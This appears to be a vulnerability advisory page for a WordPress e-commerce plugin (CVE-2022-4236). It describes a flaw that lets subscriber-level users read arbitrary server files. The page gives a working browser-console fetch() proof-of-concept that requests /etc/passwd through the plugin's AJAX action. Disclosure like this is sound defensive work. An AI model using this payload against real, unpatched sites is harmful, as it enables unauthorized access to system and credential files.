WordPress Plugin Vulnerabilities

Welcart e-Commerce < 2.8.5 - Subscriber+ Arbitrary File Access

Description

The plugin does not validate user input before using it to output the content of a file via an AJAX action available to any authenticated users, which could allow users with a role as low as subscriber to read arbitrary files on the server.

Proof of Concept

Run the below command in the developer console of the web browser while being on the blog as subscriber user

fetch("/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "method": "POST",
  "body": 'action=wel_check_progress_ajax&progressfile=/etc/passwd',
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));

Affects Plugins

Plugin icon
usc-e-shop
Fixed in 2.8.5

References

CVE
CVE-2022-4236

Classification

Type
FILE DOWNLOAD
OWASP top 10
A1: Injection
CWE
CWE-552
CVSS
7.7 (high)

Miscellaneous

Original Researcher
WPScan
Verified
Yes
WPVDB ID
436d8894-dab8-41ea-8ed0-a3338aded635

Timeline

Publicly Published
2022-12-05 (about 11 months ago)
Added
2022-12-06 (about 11 months ago)
Last Updated
2022-12-06 (about 11 months ago)

Other

Published
Title
Published
2022-10-17
Title
WooCommerce Dropshipping < 4.4 - Unauthenticated SQLi
Published
2023-04-19
Title
KIWIZ Invoices Certification & PDF System <= 2.1.3 - Unauthenticated Arbitrary File Download
Published
2022-01-06
Title
RVM - Responsive Vector Maps < 6.4.2 - Subscriber+ Arbitrary File Read
Published
2022-03-29
Title
uDraw < 3.3.3 - Unauthenticated Arbitrary File Access
Published
2022-07-12
Title
WSM Downloader <= 1.4.0 - Unauthenticated Arbitrary File Download